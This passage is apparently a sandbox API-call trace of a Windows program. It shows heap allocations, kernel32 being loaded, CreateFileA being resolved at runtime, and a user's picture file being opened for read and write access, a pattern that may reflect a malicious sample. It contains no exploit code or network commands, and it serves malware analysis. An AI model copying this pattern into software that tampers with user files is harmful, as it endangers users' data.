hHeap=0x8a0000) returned 1 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.416] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.419] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd3d8 [0190.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd3d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.422] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0190.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.423] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0190.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0190.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpUsedDefaultChar=0x0) returned 67 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.424] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\f2jfy_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x907778 [0190.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x907778, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg") returned 67 [0190.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.426] HeapFree (in: 